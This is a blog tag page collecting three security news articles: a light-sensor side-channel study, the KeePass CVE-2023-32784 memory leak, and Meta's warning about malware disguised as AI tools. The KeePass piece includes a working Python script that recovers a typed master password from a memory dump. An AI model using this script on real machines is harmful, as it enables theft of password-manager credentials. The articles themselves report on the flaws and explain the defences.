Tag: Hacker

  • Phone Light Sensor: A Potential Tool for Unauthorized Surveillance

    In our increasingly mobile-dependent lives, people entrust their smartphones with sensitive tasks ranging from financial transactions to work-related activities, and even document personal musings in apps like Notes. However, a recent study by MIT researchers sheds light on a privacy threat lurking in the unassuming ambient light sensor found in most phones.

    The Vulnerability of Ambient Light Sensors

    While smartphones often require user permissions for apps to access features like the camera or microphone, ambient light sensors typically operate without such constraints. According to the MIT team led by Yang Liu, hackers could exploit this vulnerability to track and reconstruct a user’s activities.

    The researchers developed an algorithm capable of utilizing variations captured by the light sensor to reconstruct images of a person’s touch interactions with their phone, such as scrolling or swiping. Testing the algorithm on an off-the-shelf Android tablet in various scenarios, including interactions with a dummy and gestures during video playback, revealed that light sensor data could recreate screen interactions.
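
    As a rough illustration (a minimal sketch, not the MIT team's published method; the array sizes, names, and probe-pattern scheme here are all assumptions), the reconstruction can be posed as a linear inverse problem: the screen emits known light patterns, the single ambient light sensor returns one aggregate brightness value per pattern, and a least-squares solve recovers the per-pixel occlusion left by a hand over the display:

    ```python
    # Minimal sketch of single-pixel image recovery from an ambient light
    # sensor. Illustrative only: sizes, noise level, and the random probe
    # patterns are assumptions, not the study's actual setup.
    import numpy as np

    N = 16 * 16   # toy screen resolution, flattened (16x16 pixels)
    M = 600       # number of probe patterns / sensor readings

    rng = np.random.default_rng(0)

    # Ground truth: 1.0 where light reaches the sensor, lower where a
    # finger or hand blocks it.
    mask_true = np.ones(N)
    mask_true[40:80] = 0.2  # pretend a finger covers these pixels

    # Known probe patterns displayed on the screen (random binary frames).
    patterns = rng.integers(0, 2, size=(M, N)).astype(float)

    # Each sensor reading is the total light getting through: the pattern
    # dotted with the occlusion mask, plus measurement noise.
    readings = patterns @ mask_true + rng.normal(0, 0.5, size=M)

    # Recover the occlusion image with a least-squares solve.
    mask_est, *_ = np.linalg.lstsq(patterns, readings, rcond=None)

    print("reconstruction error:", np.linalg.norm(mask_est - mask_true))
    ```

    One consequence visible even in this toy setup: each recovered frame needs many sensor readings, which helps explain the slow retrieval rate reported below.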

    Privacy Threat and Current Limitations

    Despite the potential privacy threat, the study assures that the risk is not imminent. Images could be retrieved only slowly, at one frame every 3.3 minutes, which would make it difficult for an attacker to keep up with real-time phone interactions. Additionally, images recovered while natural video was playing on the screen turned out relatively blurry.

    Mitigating Potential Risks

    To address potential risks, the researchers propose several recommendations. They emphasize the need to restrict access to ambient light sensors, requiring user permission similar to camera or microphone requests. Furthermore, they suggest imposing limitations on the sensor’s precision and speed to prevent the creation of high-resolution images. Placing the sensor on the side of the device where it cannot capture revealing gestures is also suggested as a protective measure.

    In conclusion, while the threat of exploiting ambient light sensors to invade privacy has been demonstrated, implementing suggested software restrictions and precautions can help mitigate the risks associated with this emerging vulnerability.


    Read the original article on Science Advances.

  • KeePass Exploit Enables Attackers to Recover Master Passwords from Memory

    A proof-of-concept (PoC) has been made available for a security flaw in the KeePass password manager that could be exploited to recover a victim’s master password in cleartext under certain circumstances.

    The problem, tracked as CVE-2023-32784, impacts KeePass versions 2.x for Windows, Linux, and macOS and is expected to be fixed in version 2.54, which is slated for release early next month.

    According to the security researcher “vdhoney,” the password can be recovered in plaintext apart from its first character. No code execution on the target system is required; a memory dump is enough.

    vdhoney adds that it does not matter where the memory comes from or whether the workspace is locked, and that the password can even be dumped from RAM after KeePass is no longer running, although the chance of that working decreases the longer it has been since then.

    Bypassing KeePass

    Successful exploitation requires that an attacker has already compromised a potential target’s computer. It also requires that the master password was typed on a keyboard rather than copied from the clipboard.

    vdhoney said the vulnerability concerns how the custom text box field used for entering the master password handles user input. Specifically, it leaves traces of every character the user types in the program’s memory.

    This results in a scenario wherein an attacker can dump the program’s memory and reconstruct the password in plaintext, with the exception of the first character. Users are advised to update to KeePass 2.54 once it becomes available.
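
    To illustrate the recovery step, here is a minimal sketch under stated assumptions (this is not the published PoC): suppose each keystroke leaves behind a UTF-16 string of bullet placeholder characters (U+25CF) followed by the newly typed character, so a dump contains leftover strings like “●a”, “●●b”, and so on. Scanning the dump for progressively longer runs of bullets then yields candidate characters for every position but the first:

    ```python
    # Hypothetical scraper for the leftover keystroke strings described
    # above. Assumption: the dump contains UTF-16LE strings of N bullets
    # (U+25CF) followed by the (N+1)-th typed character.
    import re
    import sys

    BULLET = "\u25cf".encode("utf-16-le")  # b"\xcf\x25"

    def recover_candidates(dump: bytes, max_len: int = 32) -> str:
        password = ["?"]  # the first character never leaks in this scheme
        for pos in range(1, max_len):
            # 'pos' bullets followed by one unknown UTF-16LE code unit
            pattern = re.escape(BULLET * pos) + rb"(..)"
            units = {m.group(1) for m in re.finditer(pattern, dump, re.DOTALL)}
            chars = sorted(
                u.decode("utf-16-le")
                for u in units
                if u[1] == 0 and 32 <= u[0] < 127  # keep printable ASCII only
            )
            if not chars:
                break  # no leftover string of this length: stop
            password.append(chars[0] if len(chars) == 1 else f"[{''.join(chars)}]")
        return "".join(password)

    if __name__ == "__main__":
        with open(sys.argv[1], "rb") as f:
            print(recover_candidates(f.read()))
    ```

    Run against a process dump (e.g. python recover.py keepass.dmp, a hypothetical invocation), it prints one candidate per position, with ambiguous positions shown in brackets and the first character left unknown.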

    The disclosure comes a few months after a different medium-severity flaw (CVE-2023-24055) was revealed in the open-source password manager, one that could be exploited to retrieve cleartext passwords from the password database by taking advantage of write access to the software’s XML configuration file.

    KeePass has insisted that the password database is not meant to be secure against an attacker with that level of local computer access.

    It also follows findings from Google security researchers outlining a flaw in password managers such as Bitwarden, Dashlane, and Safari that can be abused to auto-fill saved credentials into untrusted web pages, enabling possible account takeovers.


    Originally published on The Hacker News.

    Read more: ChatGPT and The Dark Web, Yet, A Hushed Talk in The Tech World.

  • Hackers Install Malware Instead of Promised AI

    Tech titan Meta says it expects hackers and other malicious actors online to begin using generative artificial intelligence to scale up attacks. Credit: W&V.

    On Wednesday, the social media giant Meta, parent company of Facebook, Instagram, and WhatsApp, warned that hackers are exploiting the popularity and potential of generative artificial intelligence tools like ChatGPT to lure people into installing malware on their devices. Guy Rosen, Meta’s chief information security officer, revealed that the company’s security analysts recently detected a wave of malicious software posing as ChatGPT or similar AI tools.

    Rosen’s analysis of the AI threat

    Rosen noted that generative AI has been capturing people’s imagination and excitement, and that this has not gone unnoticed by cybercriminals. The company has seen “threat actors” promote internet browser extensions that claim to offer generative AI capabilities but contain malicious code designed to infect users’ devices.

    Rosen cautioned that hackers frequently use enticing advancements as bait to deceive people into clicking on malicious links or downloading software that steals personal data, a tactic that has also been employed in crypto scams due to the high demand for digital currency.

    Meta’s security team has identified and blocked over a thousand web addresses that claim to offer ChatGPT-like tools but are in fact traps set by hackers. Although Meta has not yet seen generative AI used as more than bait, Rosen warned that its use as a weapon is inevitable and that the company is preparing for it.

    “Generative AI holds great promise and bad actors know it, so we should all be vigilant to stay safe,” Rosen said.

    Meta’s security approach to AI

    Meta is taking a proactive approach to online security by exploring the use of generative AI as a defense against hackers and online influence campaigns. Nathaniel Gleicher, the head of security policy at Meta, shared that they have teams dedicated to anticipating potential AI abuse and developing defenses to counter them. By leveraging AI as both a weapon and a shield, Meta aims to stay ahead of evolving cyber threats.

    Generative AI is a form of machine learning that uses algorithms to create original content, such as images, videos, and text, by learning from a large amount of data. This technology has numerous potential applications, from creating virtual assistants and chatbots to generating realistic images and videos that could be used in various fields like entertainment, advertising, and medicine. However, as with any new and exciting technology, it has also attracted the attention of hackers looking to exploit its potential for malicious purposes.

    One possible scenario is that hackers could use generative AI to craft convincing phishing emails that appear to come from legitimate sources, making them difficult to spot as fake. They could also use it to create deepfake videos or audio recordings to spread disinformation and manipulate public opinion.

    Ways explored by Meta to combat threats

    To counter such threats, Meta is exploring ways to use generative AI to detect and counteract fake content and attacks. One approach is to develop algorithms that can identify and flag questionable content generated by AI. Meta could also use generative AI to create more realistic and convincing simulated attacks that could help train security teams to recognize and respond to real threats.
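
    Purely as an illustration (the article does not describe Meta’s actual detection methods, and any real system would be far more sophisticated), flagging machine-generated content is often framed as a scoring problem: compute statistical signals over a passage and flag it when they cross a threshold. The toy heuristic below uses a single weak signal, vocabulary repetitiveness:

    ```python
    # Toy illustration of flagging "questionable" text with a statistical
    # signal. This is NOT Meta's method; production detectors rely on
    # model-based features. Here, a low type-token ratio (few distinct
    # words relative to total words) serves as one weak hint of
    # repetitive, machine-generated text.
    def type_token_ratio(text: str) -> float:
        words = text.lower().split()
        return len(set(words)) / len(words) if words else 1.0

    def flag_suspicious(text: str, threshold: float = 0.4) -> bool:
        # Flag passages whose vocabulary diversity falls below the threshold.
        return type_token_ratio(text) < threshold

    sample = "win a prize win a prize click the link click the link now"
    print(flag_suspicious(sample))  # True: highly repetitive
    ```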

    Overall, Meta’s warning about the potential misuse of generative AI is a reminder that as exciting as new technologies can be, they can also be exploited for nefarious purposes. Individuals and companies need to be aware of these risks and take steps to protect themselves. In this case, it means being cautious when installing new software or browser extensions and watching for any suspicious behavior or activity.


    Read the original article on Tech Explore.

    Read more: The Green Hydrogen Time, as a Renewable Energy Source.